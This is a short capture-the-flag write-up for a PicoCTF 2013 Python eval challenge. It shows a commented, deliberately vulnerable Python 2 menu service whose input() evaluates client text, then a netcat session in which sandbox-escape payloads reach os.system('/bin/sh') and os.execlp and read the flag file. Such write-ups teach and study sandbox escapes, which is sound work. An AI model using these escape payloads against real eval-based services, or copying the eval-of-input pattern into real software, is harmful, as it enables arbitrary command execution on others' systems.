# PicoCTF 2k13 - Python Eval 3


$ cat task3.py
#!/usr/bin/python -u
# task3.py
# Remember kids: this is bad code. Try not to code like this :P

from os import path
# Sandbox attempt: strip the import machinery out of builtins so that
# evaluated input cannot call __import__() or reload(). This is a denylist
# and it does not hold: `path` (imported above) is still a live module object
# in this namespace, and attributes of that module remain reachable from it,
# including a reference to `os`, without any import statement.
del __builtins__.__dict__['__import__']
del __builtins__.__dict__['reload']

print "Welcome to the food menu!"
# Each entry is (display name, price, description file path). The third field
# is passed to path.exists() and open() by print_description.
choices = (
  ("Chicken Asada Burrito", 7.69, "caburrito.txt"),
  ("Beef Chow Mein", 6.69, "beefchow.txt"),
  ("MeatBurger Deluxe", 10.49, "no description"),
  # ...
)

def print_description(n):
  """Print the description text for menu item n.

  n is compared against len(choices) as an upper bound only and then used
  as an index into choices. The third field of the selected entry is
  treated as a file path: if it exists its contents are printed, otherwise
  a placeholder message is shown.
  """
  print ""
  # Only the upper bound is checked: a negative n passes this test and
  # indexes from the end of the tuple. n is never checked to be an int.
  if n >= len(choices):
    print "No such item!"
  # Entries whose third field is not an existing path (presumably the
  # literal "no description") end up here.
  elif not path.exists(choices[n][2]):
    print "No description yet, but we promise it's tasty!"
  else:
    # The path comes from the hard-coded table, not from the client. The
    # file object is never closed explicitly.
    print open(choices[n][2]).read()

def show_menu():
  """Print one line per entry in choices: index, price, display name."""
  for i in xrange(len(choices)):
    # choices[i][1] is the price, choices[i][0] the display name.
    print "[% 2d] $% 3.2f %s" % (i, choices[i][1], choices[i][0])

# Main loop: prompt, show the menu, print the requested description. Forever.
while True:
  print "Which description do you want to read?"
  show_menu()
  # SECURITY: in Python 2, input() is eval(raw_input()). The line read from
  # the client is evaluated as a Python expression with this module's names
  # (path, choices, ...) in scope, before print_description ever sees the
  # result. Deleting __import__/reload above does not contain that. To accept
  # only a menu index, read the line with raw_input() and convert it with
  # int(), rejecting anything that fails to parse.
  print_description(input('> '))
$ nc python.picoctf.com 6363
Welcome to the food menu!
Which description do you want to read?
[ 0] $ 7.69 Chicken Asada Burrito
[ 1] $ 6.69 Beef Chow Mein
[ 2] $ 10.49 MeatBurger Deluxe
> path.warnings.catch_warnings.__init__.func_globals['linecache'].__dict__['os'].system('/bin/sh')
> path.os.execlp('sh','')
id
uid=1004(py3) gid=1005(py3) groups=1005(py3)
ls
run.sh
task3.py
your_flag_here
cat your_flag_here
eval_is_super_OSsome
